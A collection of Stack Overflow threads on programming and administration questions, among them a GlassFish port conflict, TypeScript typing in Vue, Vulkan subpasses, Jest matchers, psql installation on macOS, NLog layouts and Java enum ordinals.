asadmin set server.http-service.http-listener.http-listener-1.port=10080
but it shows this error
remote failure: No configuration found for server.http-service.http-listener.http-listener-1
Command set failed.
I can't understand why.
A: Assuming you are running glassifhs under linux
1 - Check if glassfish is already runnig.
ps -ef |grep java
kill any process java relative to glassfish
2 - Check if the port 4848 is in use
netstat -nao |grep 4848
3 - Change the default port
Edit the file {glassfish_home}/config/asadminenv.conf
AS_ADMIN_PORT=4848
| Q: Glassfish There is a process already using the admin port 4848 asadmin start-domain domain1
But it shows this error.
There is a process already using the admin port 4848 -- it probably is another instance of a GlassFish server.
I have searched and found that it could be the hostname or that the port is used by an other application or server and actually it is used by TCP.
I have no problem with the hostname so I've tried this solution by changing port.
asadmin set server.http-service.http-listener.http-listener-1.port=10080
but it shows this error
remote failure: No configuration found for server.http-service.http-listener.http-listener-1
Command set failed.
I can't understand why.
A: Assuming you are running glassifhs under linux
1 - Check if glassfish is already runnig.
ps -ef |grep java
kill any process java relative to glassfish
2 - Check if the port 4848 is in use
netstat -nao |grep 4848
3 - Change the default port
Edit the file {glassfish_home}/config/asadminenv.conf
AS_ADMIN_PORT=4848
A: I just kill all glassfish processes
pkill -f glassfish
A: I hit the same error.
This was useful - i.e. check you can ping $(hostname). Looks like glassfish checks hostname against IP, possibly during bind process.
My issue was my hostname/ip address in /etc/hosts was not aligned correctly, meaning I could not ping $(hostname). Once aligned and pinged, glassfish started ok.
A: I just hit this issue today. Be sure to delete the $PATH/TO/domain1/config/pid and $PATH/TO/domain1/config/pid.prev files as well, if the process isn't running but is being reported as still running.
| stackoverflow | {
"language": "en",
"length": 251,
"provenance": "stackexchange_0000F.jsonl.gz:900664",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654024"
} |
c5464a6c194d7e9b5920134f1a15959026e5d61d | Stackoverflow Stackexchange
Q: Typescript / Vuejs not compiling for computed property I'm starting to learn typescript & Vuejs.
Can anyone explain me why I can't access the account property in data from the computed allChecked()?
import * as Vue from "vue";
declare var accounts: any[];
var app = new Vue({
el: '#vueowner',
data: {
accounts: accounts,
hasAccount: this.accounts.length > 0,
checkedAccounts: []
},
computed: {
allChecked() {
return this.accounts.length === this.checkedAccounts.length;
}
}
})
I have this errors
ERROR in index.ts
(25,25): error TS2339: Property 'accounts' does not exist on type 'Vue'.
ERROR in index.ts
(25,50): error TS2339: Property 'checkedAccounts' does not exist on type 'Vue'.
A: In your allChecked method the this keyword isn't referencing the option object you are passing to the Vueconstructor, but the instance of the Vue class itself.
You will need to create a class that extends Vue with the properties you wish to add to the original class :
import * as Vue from "vue";
class MyVue extends Vue {
accounts: any[];
checkedAccounts: any[];
}
const app = new MyVue({
// (...)
})
If you need more information about using Vue.js with Typescript check out this page: https://v2.vuejs.org/v2/guide/typescript.html
| Q: Typescript / Vuejs not compiling for computed property I'm starting to learn typescript & Vuejs.
Can anyone explain me why I can't access the account property in data from the computed allChecked()?
import * as Vue from "vue";
declare var accounts: any[];
var app = new Vue({
el: '#vueowner',
data: {
accounts: accounts,
hasAccount: this.accounts.length > 0,
checkedAccounts: []
},
computed: {
allChecked() {
return this.accounts.length === this.checkedAccounts.length;
}
}
})
I have this errors
ERROR in index.ts
(25,25): error TS2339: Property 'accounts' does not exist on type 'Vue'.
ERROR in index.ts
(25,50): error TS2339: Property 'checkedAccounts' does not exist on type 'Vue'.
A: In your allChecked method the this keyword isn't referencing the option object you are passing to the Vueconstructor, but the instance of the Vue class itself.
You will need to create a class that extends Vue with the properties you wish to add to the original class :
import * as Vue from "vue";
class MyVue extends Vue {
accounts: any[];
checkedAccounts: any[];
}
const app = new MyVue({
// (...)
})
If you need more information about using Vue.js with Typescript check out this page: https://v2.vuejs.org/v2/guide/typescript.html
A: Looks like you need to annotate the return types because TypeScript has difficulties inferring the types of certain methods.
so instead of
allChecked() {
return this.accounts.length === this.checkedAccounts.length;
}
try this
allChecked(): boolean {
return this.accounts.length === this.checkedAccounts.length;
}
A: This is a good article to start with
VuejS with Typescript
https://johnpapa.net/vue-typescript/
<template>
</template>
<script lang="ts">
import {Component, Vue} from 'vue-property-decorator';
export default class App extends Vue {
public accounts: any = [];
public checkedAccounts: any = [];
public created(): void {
this.accounts = [];
this.checkedAccounts= [];
}
public allChecked(): boolean {
return this.accounts.length === this.checkedAccounts.length;
}
}
</script>
| stackoverflow | {
"language": "en",
"length": 292,
"provenance": "stackexchange_0000F.jsonl.gz:900665",
"question_score": "11",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654029"
} |
72b5a00c13c2f57fb301c977ac842b4486a07128 | Stackoverflow Stackexchange
Q: Can multiple subpass be used with single pipeline in vulkan VkGraphicsPipelineCreateInfo has integer member subpass.
My use case is creating a single pipeline object and use it with multiple subpasses. Each subpass has different color attachment.
A: No. A pipeline is always built relative to a specific subpass of a specific render pass. It cannot be used in any other subpass:
The subpass index of the current render pass must be equal to the subpass member of the VkGraphicsPipelineCreateInfo structure specified when creating the VkPipeline currently bound to VK_PIPELINE_BIND_POINT_GRAPHICS.
You will need to create multiple pipelines, one for each subpass you intend to use it with. The pipeline cache should make this efficient for implementations that don't really care much about this.
| Q: Can multiple subpass be used with single pipeline in vulkan VkGraphicsPipelineCreateInfo has integer member subpass.
My use case is creating a single pipeline object and use it with multiple subpasses. Each subpass has different color attachment.
A: No. A pipeline is always built relative to a specific subpass of a specific render pass. It cannot be used in any other subpass:
The subpass index of the current render pass must be equal to the subpass member of the VkGraphicsPipelineCreateInfo structure specified when creating the VkPipeline currently bound to VK_PIPELINE_BIND_POINT_GRAPHICS.
You will need to create multiple pipelines, one for each subpass you intend to use it with. The pipeline cache should make this efficient for implementations that don't really care much about this.
| stackoverflow | {
"language": "en",
"length": 123,
"provenance": "stackexchange_0000F.jsonl.gz:900667",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654037"
} |
a6297705bff230b8f33a7823e5bdc22e8cdc2d85 | Stackoverflow Stackexchange
Q: Get-Date formatting/culture How do I specify what part of my input string is the date and month?
If the input is 01/10/2017, this can be read as 1st Oct 2017 and 10th Jan 2017. Both are correct.
I want to be explicit that 01 is date and 10 is month, so that irrespective of locale and time format I can get a consistent result.
Sample code:
get-date -Date '01/10/2017'
The output is:
Tuesday, January 10, 2017 12:00:00 AM
The desired output is:
Sunday, October 01, 2017 12:00:00 AM
A: I have a solution for you. It requires that the culture as one of the arguments.
([datetime]::ParseExact($date,"dd/MM/yyyy",[Globalization.CultureInfo]::CreateSpecificCulture('en-GB')))
A culture does not have to be specified. However, the argument for it does, otherwise you will get an error:
Cannot find an overload for "ParseExact" and the argument count: "2".
[cultureinfo]::InvariantCulture or $null can be used as the third argument:
$date = "01/10/2017"
[datetime]::ParseExact($date, "dd/MM/yyyy", [cultureinfo]::InvariantCulture)
[datetime]::ParseExact($date, "dd/MM/yyyy", $null)
Output in all three cases
01 October 2017 00:00:00
| Q: Get-Date formatting/culture How do I specify what part of my input string is the date and month?
If the input is 01/10/2017, this can be read as 1st Oct 2017 and 10th Jan 2017. Both are correct.
I want to be explicit that 01 is date and 10 is month, so that irrespective of locale and time format I can get a consistent result.
Sample code:
get-date -Date '01/10/2017'
The output is:
Tuesday, January 10, 2017 12:00:00 AM
The desired output is:
Sunday, October 01, 2017 12:00:00 AM
A: I have a solution for you. It requires that the culture as one of the arguments.
([datetime]::ParseExact($date,"dd/MM/yyyy",[Globalization.CultureInfo]::CreateSpecificCulture('en-GB')))
A culture does not have to be specified. However, the argument for it does, otherwise you will get an error:
Cannot find an overload for "ParseExact" and the argument count: "2".
[cultureinfo]::InvariantCulture or $null can be used as the third argument:
$date = "01/10/2017"
[datetime]::ParseExact($date, "dd/MM/yyyy", [cultureinfo]::InvariantCulture)
[datetime]::ParseExact($date, "dd/MM/yyyy", $null)
Output in all three cases
01 October 2017 00:00:00
A: Try this:
Get-Date(Get-Date -Date $date -Format 'dd/MM/yyyy')
A: You can enforce the culture for single commands (or command blocks). This should help avoiding that date chaos.
PS C:\> [System.Threading.Thread]::CurrentThread.CurrentUICulture = "en-US" ; [System.Threading.Thread]::CurrentThread.CurrentCulture = "en-US"; get-date -Date '01/10/2017'
Tuesday, January 10, 2017 12:00:00 AM
PS C:\> [System.Threading.Thread]::CurrentThread.CurrentUICulture = "en-GB" ; [System.Threading.Thread]::CurrentThread.CurrentCulture = "en-GB"; get-date -Date '01/10/2017'
01 October 2017 00:00:00
| stackoverflow | {
"language": "en",
"length": 227,
"provenance": "stackexchange_0000F.jsonl.gz:900669",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654045"
} |
70257de2a550cf00c10df13ad2bf8b97cf850965 | Stackoverflow Stackexchange
Q: Logical OR for expected results in Jest It will be the best explain in on example
expected(someNumber).toBe(1).or.toBe(-2).or.toBe(22) // expect result is 1 or -2 or 22
This is bad syntax, but can do sth like that in jest?
A: As @JrGiant suggested, there could be a toBeOneOf, however, it is easy top implement your own matcher:
Example in TypeScript:
expect.extend({
toBeOneOf(received: any, items: Array<any>) {
const pass = items.includes(received);
const message = () =>
`expected ${received} to be contained in array [${items}]`;
if (pass) {
return {
message,
pass: true
};
}
return {
message,
pass: false
};
}
});
// Declare that jest contains toBeOneOf
// If you are not using TypeScript, remove this "declare global" altogether
declare global {
namespace jest {
interface Matchers<R> {
toBeOneOf(items: Array<any>): CustomMatcherResult;
}
}
}
describe("arrays", () => {
describe("getRandomItemFromArray", () => {
it("should return one of the expected - 1", () => {
expect(getRandomItemFromArray([1, 2])).toBeOneOf([1, 2])
});
});
});
| Q: Logical OR for expected results in Jest It will be the best explain in on example
expected(someNumber).toBe(1).or.toBe(-2).or.toBe(22) // expect result is 1 or -2 or 22
This is bad syntax, but can do sth like that in jest?
A: As @JrGiant suggested, there could be a toBeOneOf, however, it is easy top implement your own matcher:
Example in TypeScript:
expect.extend({
toBeOneOf(received: any, items: Array<any>) {
const pass = items.includes(received);
const message = () =>
`expected ${received} to be contained in array [${items}]`;
if (pass) {
return {
message,
pass: true
};
}
return {
message,
pass: false
};
}
});
// Declare that jest contains toBeOneOf
// If you are not using TypeScript, remove this "declare global" altogether
declare global {
namespace jest {
interface Matchers<R> {
toBeOneOf(items: Array<any>): CustomMatcherResult;
}
}
}
describe("arrays", () => {
describe("getRandomItemFromArray", () => {
it("should return one of the expected - 1", () => {
expect(getRandomItemFromArray([1, 2])).toBeOneOf([1, 2])
});
});
});
A: I recommend using the .toContain(item) matcher. The documentation can be found here.
The below code should work well:
expect([1, -2, 22]).toContain(someNumber);
A: I was also looking for a solution for the expect.oneOf issue. You may want to checkout d4nyll's solution.
Here is an example of how it could work.
expect(myfunction()).toBeOneOf([1, -2, 22]);
A: A simple way around this is to use the standard .toContain() matcher (https://jestjs.io/docs/en/expect#tocontainitem) and reverse the expect statement:
expect([1, -2, 22]).toContain(someNumber);
A: If you really needed to do exactly that, I suppose you could put the logical comparisons inside the expect call, e.g.
expect(someNumber === 1 || someNumber === -2 || someNumber === 22).toBeTruthy();
If this is just for a "quick and dirty" check, this might suffice.
However, as suggested by several comments under your question, there seem to be several "code smells" that make both your initial problem as well as the above solution seem like an inappropriate way of conducting a test.
First, in terms of my proposed solution, that use of toBeTruthy is a corruption of the way Jasmine/Jest matchers are meant to be used. It's a bit like using expect(someNumber === 42).toBeTruthy(); instead of expect(someNumber).toBe(42). The structure of Jest/Jasmine tests is to provide the actual value in the expect call (i.e. expect(actualValue)) and the expected value in the matcher (e.g. toBe(expectedValue) or toBeTruthy() where expectedValue and true are the expected values respectively). In the case above, the actual value is (inappropriately) provided in the expect call, with the toBeTruthy matcher simply verifying this fact.
It might be that you need to separate your tests. For example, perhaps you have a function (e.g. called yourFunction) that you are testing that provides (at least) 3 different possible discrete outputs. I would presume that the value of the output depends on the value of the input. If that is the case, you should probably test all input/output combinations separately, e.g.
it('should return 1 for "input A" ', () => {
const someNumber = yourFunction("input A");
expect(someNumber).toBe(1);
});
it('should return -2 for "input B" ', () => {
const someNumber = yourFunction("input B");
expect(someNumber).toBe(-2);
});
it('should return 22 for "input C" ', () => {
const someNumber = yourFunction("input C");
expect(someNumber).toBe(22);
});
..or at least...
it('should return the appropriate values for the appropriate input ', () => {
let someNumber;
someNumber = yourFunction("input A");
expect(someNumber).toBe(1);
someNumber = yourFunction("input B");
expect(someNumber).toBe(-2);
someNumber = yourFunction("input C");
expect(someNumber).toBe(22);
});
One of the positive consequences of doing this is that, if your code changes in the future such that, e.g. one (but only one) of the conditions changes (in terms of either input or output), you only need to update one of three simpler tests instead of the single more complicated aggregate test. Additionally, with the tests separated this way, a failing test will more quickly tell you exactly where the problem is, e.g. with "input A", "input B", or "input C".
Alternatively, you may need to actually refactor yourFunction, i.e. the code-under-test itself. Do you really want to have a particular function in your code returning three separate discrete values depending on different input? Perhaps so, but I would examine the code separately to see if it needs to be re-written. It's hard to comment on this further without knowing more details about yourFunction.
A: To avoid putting all the logical comparisons in one statement and using toBeTruthy(), you can use nested try/catch statements:
try {
expect(someNumber).toBe(1)
}
catch{
try {
expect(someNumber).toBe(-2)
}
catch{
expect(someNumber).toBe(22)
}
}
To make it more convenient and more readable, you can put this into a helper function:
function expect_or(...tests) {
if (!tests || !Array.isArray(tests)) return;
try {
tests.shift()?.();
} catch (e) {
if (tests.length) expect_or(...tests);
else throw e;
}
}
NB: With Typescript replace line 1 with function expect_or(...tests: (() => void)[]) { to add types to the function parameter.
and use it like this:
expect_or(
() => expect(someNumber).toBe(1),
() => expect(someNumber).toBe(-2),
() => expect(someNumber).toBe(22)
);
| stackoverflow | {
"language": "en",
"length": 812,
"provenance": "stackexchange_0000F.jsonl.gz:900723",
"question_score": "67",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654210"
} |
bf5027f58ac8444c310800d4275775235129c247 | Stackoverflow Stackexchange
Q: Correct way to install psql without full Postgres on macOS? Official page do not mention such case. But many users need only psql without a local database (I have it on AWS). Brew do not have psql.
A:
libpq 11.2
MacOS & zsh or bash
below works
*
*install libpq
brew install libpq
*update PATH
if use zsh:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.zshrc
source ~/.zshrc
if use bash:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.bash_profile
source ~/.bash_profile
| Q: Correct way to install psql without full Postgres on macOS? Official page do not mention such case. But many users need only psql without a local database (I have it on AWS). Brew do not have psql.
A:
libpq 11.2
MacOS & zsh or bash
below works
*
*install libpq
brew install libpq
*update PATH
if use zsh:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.zshrc
source ~/.zshrc
if use bash:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.bash_profile
source ~/.bash_profile
A: You could also use homebrew to install libpq.
brew install libpq
This would give you psql, pg_dump and a whole bunch of other client utilities without installing Postgres.
Unfortunately since it provides some of the same utilities as are included in the full postgresql package, brew installs it "keg-only" which means it isn't in the PATH by default. Homebrew will spit out some information on how to add it to your PATH after installation. In my case it was this:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.zshrc
Alternatively, you can create symlinks for the utilities you need. E.g.:
ln -s /usr/local/Cellar/libpq/10.3/bin/psql /usr/local/bin/psql
Note: used installed version instead of 10.3.
Alternatively, you could instruct homebrew to "link all of its binaries to the PATH anyway"
brew link --force libpq
but then you'd be unable to install the postgresql package later.
A: Homebrew only really has the postgres formula, and doesn't have any specific formula that only installs the psql tool.
So the "correct way" to get the psql application is indeed to install the postgres formula, and you'll see toward the bottom of the "caveats" section that it doesn't actually run the database, it just puts the files on your system:
$ brew install postgres
==> Downloading https://homebrew.bintray.com/bottles/postgresql-9.6.5.sierra.bottle.tar.gz
######################################################################## 100.0%
==> Pouring postgresql-9.6.5.sierra.bottle.tar.gz
==> /usr/local/Cellar/postgresql/9.6.5/bin/initdb /usr/local/var/postgres
==> Caveats
<snip>
To have launchd start postgresql now and restart at login:
brew services start postgresql
Or, if you don't want/need a background service you can just run:
pg_ctl -D /usr/local/var/postgres start
==> Summary
/usr/local/Cellar/postgresql/9.6.5: 3,269 files, 36.7MB
Now you can use psql to connect to remote Postgres servers, and won't be running a local one, although you could if you really wanted to.
To verify that the local postgres daemon isn't running, check your installed homebrew services:
$ brew services list
Name Status User Plist
mysql stopped
postgresql stopped
If you don't have Homebrew Services installed, just
$ brew tap homebrew/services
...and you'll get this functionality. For more information on Homebrew Services, read this excellent blog post that explains how it works.
A: I found all of these really unsatisfying, especially if you have to support multiple versions of postgres. A MUCH easier solution is to download the binaries here:
https://www.enterprisedb.com/download-postgresql-binaries
And simply run the executable version of psql that matches the database you're working against without any extra steps.
example:
./path/to/specific/version/bin/psql -c '\x' -c 'SELECT * FROM foo;'
A: If you truly don't need postgresql then you don't even have to alter your path to use libra, just link libpq. The docs say the only reason it isn't is to avoid conflicts with the PostgreSQL package.
brew uninstall postgresql
brew install libpq
brew link --force libpq
A: Install libpq:
brew install libpq
Then, create a symlink:
sudo ln -s $(brew --prefix)/opt/libpq/bin/psql /usr/local/bin/psql
Hope it helps.
A: Found so many useful answers here, but a bit outdated since homebrew moved the installation files to /opt/homebrew/Cellar/libpq/15.1. After libpq is installed with brew install libpq you can run below command to see new location
brew link --force libpq
Then you can add it to your zshrc with
echo 'export PATH="/opt/homebrew/Cellar/libpq/15.1/bin:$PATH"' >> ~/.zshrc
A: You could try brew install postgresql
But this provides a nice GUI to manage your databases https://postgresapp.com
| stackoverflow | {
"language": "en",
"length": 610,
"provenance": "stackexchange_0000F.jsonl.gz:900725",
"question_score": "334",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654216"
} |
04437bf2e06a214fd3e7d6791786de0097f423bb | Stackoverflow Stackexchange
Q: Best approach to assemble uploaded file chunks using spring-boot I am using spring-boot for my back end and plupload at front end to upload chunked files.
I have a post rest endpoint, which accepts a Multipart file in the form-data.
The scenario is, based on the chunk size plupload will create n chunks and will call the post endpoint n times, with each time the subsequent chunks.
Now i need to assemble these chunks at the server end, the endpoint might get requests from many clients simultaneously, so the problem is
1) Need to identify all the requests from same client.
2) Need to identify chunk0,chunk1...., chunk1 of same file
3) Need to wait until all chunks get uploaded before reassembling.
My constraint is, i wont get large local storage space to store those chunks as temp files in a folder path, and maintain a hashmap for each file through some unique identifier and reassemble once the nth file reaches.
If someone has got some solution around this problem, please provide an answer or some git hub links would help.
| Q: Best approach to assemble uploaded file chunks using spring-boot I am using spring-boot for my back end and plupload at front end to upload chunked files.
I have a post rest endpoint, which accepts a Multipart file in the form-data.
The scenario is, based on the chunk size plupload will create n chunks and will call the post endpoint n times, with each time the subsequent chunks.
Now i need to assemble these chunks at the server end, the endpoint might get requests from many clients simultaneously, so the problem is
1) Need to identify all the requests from same client.
2) Need to identify chunk0,chunk1...., chunk1 of same file
3) Need to wait until all chunks get uploaded before reassembling.
My constraint is, i wont get large local storage space to store those chunks as temp files in a folder path, and maintain a hashmap for each file through some unique identifier and reassemble once the nth file reaches.
If someone has got some solution around this problem, please provide an answer or some git hub links would help.
| stackoverflow | {
"language": "en",
"length": 181,
"provenance": "stackexchange_0000F.jsonl.gz:900727",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654220"
} |
02e3786680030560813c9456015fdf25a4ab9163 | Stackoverflow Stackexchange
Q: How to format NLog exception output to get a line separator? How to get the below output format using NLog error logging; A line separator between each exception log. like;
2017-06-19 16:53:20|SessionVal| Error message| Exception's Message | StackTrace
_______________________________________________________________________________________ 2017-06-19 16:52:10|SessionVal|Error occured while executing the procedure.
|Procedure xyz expects varchar(20) @ParameterName.|StackTrace....
Current NLog configuration;
<nlog autoReload="true" xmlns="http://www.nlog-project.org/schemas/NLog.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<targets>
<target name="logfile" xsi:type="File"
layout="${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet- session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log" />
</targets>
<rules>
<logger name="*" minlevel="Info" writeTo="logfile" />
</rules>
</nlog>
Update: @Amy, are you telling like this;
Update 2: Thank you @Amy it worked.
layout="--------------------------------------------------------------
${newline}${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet- session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log"
A: According to the asker of the question this is a solution:
layout="--------------------------------------------------------------
${newline}${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet- session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log"
| Q: How to format NLog exception output to get a line separator? How to get the below output format using NLog error logging; A line separator between each exception log. like;
2017-06-19 16:53:20|SessionVal| Error message| Exception's Message | StackTrace
_______________________________________________________________________________________ 2017-06-19 16:52:10|SessionVal|Error occured while executing the procedure.
|Procedure xyz expects varchar(20) @ParameterName.|StackTrace....
Current NLog configuration;
<nlog autoReload="true" xmlns="http://www.nlog-project.org/schemas/NLog.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<targets>
<target name="logfile" xsi:type="File"
layout="${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet- session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log" />
</targets>
<rules>
<logger name="*" minlevel="Info" writeTo="logfile" />
</rules>
</nlog>
Update: @Amy, are you telling like this;
Update 2: Thank you @Amy it worked.
layout="--------------------------------------------------------------
${newline}${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet- session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log"
A: According to the asker of the question this is a solution:
layout="--------------------------------------------------------------
${newline}${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet- session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log"
| stackoverflow | {
"language": "en",
"length": 128,
"provenance": "stackexchange_0000F.jsonl.gz:900738",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654276"
} |
15599f1b80bb60f7ddbb1d95cc48594e88defab9 | Stackoverflow Stackexchange
Q: Is it good practice to use ordinal of enum? I have an enum:
public enum Persons {
CHILD,
PARENT,
GRANDPARENT;
}
Is there any problem with using ordinal() method to check "hierarchy" between enum members? I mean - is there any disadvantages when using it excluding verbosity, when somebody can change accidentally order in future.
Or is it better to do something like that:
public enum Persons {
CHILD(0),
PARENT(1),
GRANDPARENT(2);
private Integer hierarchy;
private Persons(final Integer hierarchy) {
this.hierarchy = hierarchy;
}
public Integer getHierarchy() {
return hierarchy;
}
}
A: If you only want to create relationships between enum values, you can actually use the trick of using other enum values:
public enum Person {
GRANDPARENT(null),
PARENT(GRANDPARENT),
CHILD(PARENT);
private final Person parent;
private Person(Person parent) {
this.parent = parent;
}
public final Parent getParent() {
return parent;
}
}
Note that you can only use enum values that were declared lexically before the one you're trying to declare, so this only works if your relationships form an acyclic directed graph (and the order you declare them is a valid topological sort).
| Q: Is it good practice to use ordinal of enum? I have an enum:
public enum Persons {
CHILD,
PARENT,
GRANDPARENT;
}
Is there any problem with using ordinal() method to check "hierarchy" between enum members? I mean - is there any disadvantages when using it excluding verbosity, when somebody can change accidentally order in future.
Or is it better to do something like that:
public enum Persons {
CHILD(0),
PARENT(1),
GRANDPARENT(2);
private Integer hierarchy;
private Persons(final Integer hierarchy) {
this.hierarchy = hierarchy;
}
public Integer getHierarchy() {
return hierarchy;
}
}
A: If you only want to create relationships between enum values, you can actually use the trick of using other enum values:
public enum Person {
GRANDPARENT(null),
PARENT(GRANDPARENT),
CHILD(PARENT);
private final Person parent;
private Person(Person parent) {
this.parent = parent;
}
public final Parent getParent() {
return parent;
}
}
Note that you can only use enum values that were declared lexically before the one you're trying to declare, so this only works if your relationships form an acyclic directed graph (and the order you declare them is a valid topological sort).
A: TLDR: No, you should not!
If you refer to the javadoc for ordinal method in Enum.java:
Most programmers will have no use for this method. It is
designed for use by sophisticated enum-based data structures, such
as java.util.EnumSet and java.util.EnumMap.
Firstly - read the manual (javadoc in this case).
Secondly - don't write brittle code. The enum values may change in future and your second code example is much more clear and maintainable.
You definitely don't want to create problems for the future if a new enum value is (say) inserted between PARENT and GRANDPARENT.
A: Using ordinal() is unrecommended as changes in the enum's declaration may impact the ordinal values.
UPDATE:
It is worth noting that the enum fields are constants and can have duplicated values, i.e.
enum Family {
OFFSPRING(0),
PARENT(1),
GRANDPARENT(2),
SIBLING(3),
COUSING(4),
UNCLE(4),
AUNT(4);
private final int hierarchy;
private Family(int hierarchy) {
this.hierarchy = hierarchy;
}
public int getHierarchy() {
return hierarchy;
}
}
Depending on what you're planning to do with hierarchy this could either be damaging or beneficial.
Furthermore, you could use the enum constants to build your very own EnumFlags instead of using EnumSet, for example
A: I would use your second option (using a explicit integer) so the numeric values are assigned by you and not by Java.
A: Let's consider following example:
We need to order several filters in our Spring Application. This is doable by registering filters via FilterRegistrationBeans:
@Bean
public FilterRegistrationBean compressingFilterRegistration() {
FilterRegistrationBean registration = new FilterRegistrationBean();
registration.setFilter(compressingFilter());
registration.setName("CompressingFilter");
...
registration.setOrder(1);
return registration;
}
Let's assume we have several filters and we need to specify their order (e.g. we want to set as first the filter which add do MDC context the JSID for all loggers)
And here I see the perfect usecase for ordinal(). Let's create the enum:
enum FilterRegistrationOrder {
MDC_FILTER,
COMPRESSING_FILTER,
CACHE_CONTROL_FILTER,
SPRING_SECURITY_FILTER,
...
}
Now in registration bean we can use:
registration.setOrder(MDC_FILTER.ordinal());
And it works perfectly in our case. If we haven't had an enum to do that we would have had to re-numerate all filters orders by adding 1 to them (or to constants which stores them). When we have enum you only need to add one line in enum in proper place and use ordinal. We don't have to change the code in many places and we have the clear structure of order for all our filters in one place.
In the case like this I think the ordinal() method is the best option to achieve the order of filters in clean and maintainable way
A: You must use your judgement to evaluate which kind of errors would be more severe in your particular case. There is no one-size-fits-all answer to this question. Each solution leverages one advantage of the compiler but sacrifices the other.
If your worst nightmare is enums sneakily changing value: use ENUM(int)
If your worst nightmare is enum values becoming duplicated or losing contiguousness: use ordinal.
A: As suggested by Joshua Bloch in Effective Java, it's not a good idea to derive a value associated with an enum from its ordinal, because changes to the ordering of the enum values might break the logic you encoded.
The second approach you mention follows exactly what the author proposes, which is storing the value in a separate field.
I would say that the alternative you suggested is definitely better because it is more extendable and maintainable, as you are decoupling the ordering of the enum values and the notion of hierarchy.
A: The first way is not straight understandable as you have to read the code where the enums are used to understand that the order of the enum matters.
It is very error prone.
public enum Persons {
CHILD,
PARENT,
GRANDPARENT;
}
The second way is better as it is self explanatory :
CHILD(0),
PARENT(1),
GRANDPARENT(2);
private SourceType(final Integer hierarchy) {
this.hierarchy = hierarchy;
}
Of course, orders of the enum values should be consistent with the hierarchical order provided by the enum constructor arguments.
It introduces a kind of redundancy as both the enum values and the arguments of the enum constructor conveys the hierarchy of them.
But why would it be a problem ?
Enums are designed to represent constant and not frequently changing values.
The OP enum usage illustrates well a good enum usage :
CHILD, PARENT, GRANDPARENT
Enums are not designed to represent values that moves frequently.
In this case, using enums is probably not the best choice as it may breaks frequently the client code that uses it and besides it forces to recompile, repackage and redeploy the application at each time an enum value is modified.
A: First, you probably don't even need a numeric order value -- that's
what Comparable
is for, and Enum<E> implements Comparable<E>.
If you do need a numeric order value for some reason, yes, you should
use ordinal(). That's what it's for.
Standard practice for Java Enums is to sort by declaration order,
which is why Enum<E> implements Comparable<E> and why
Enum.compareTo() is final.
If you add your own non-standard comparison code that doesn't use
Comparable and doesn't depend on the declaration order, you're just
going to confuse anyone else who tries to use your code, including
your own future self. No one is going to expect that code to exist;
they're going to expect Enum to be Enum.
If the custom order doesn't match the declaration order, anyone
looking at the declaration is going to be confused. If it does
(happen to, at this moment) match the declaration order, anyone
looking at it is going to come to expect that, and they're going to
get a nasty shock when at some future date it doesn't. (If you write
code (or tests) to ensure that the custom order matches the
declaration order, you're just reinforcing how unnecessary it is.)
If you add your own order value, you're creating maintenance headaches
for yourself:
*
*you need to make sure your hierarchy values are unique
*if you add a value in the middle, you need to renumber all
subsequent values
If you're worried someone could change the order accidentally in the
future, write a unit test that checks the order.
In sum, in the immortal words of Item 47:
know and use the libraries.
P.S. Also, don't use Integer when you mean int.
A: According to java doc
Returns the ordinal of this enumeration constant (its position in its
enum declaration, where the initial constant is assigned an ordinal of
zero). Most programmers will have no use for this method. It is
designed for use by sophisticated enum-based data structures, such as
EnumSet and EnumMap.
You can control the ordinal by changing the order of the enum, but you cannot set it explicitly.One workaround is to provide an extra method in your enum for the number you want.
enum Mobile {
Samsung(400), Nokia(250),Motorola(325);
private final int val;
private Mobile (int v) { val = v; }
public int getVal() { return val; }
}
In this situation Samsung.ordinal() = 0, but Samsung.getVal() = 400.
A: This is not a direct answer to your question. Rather better approach for your usecase. This way makes sure that next developer will explicitly know that values assigned to properties should not be changed.
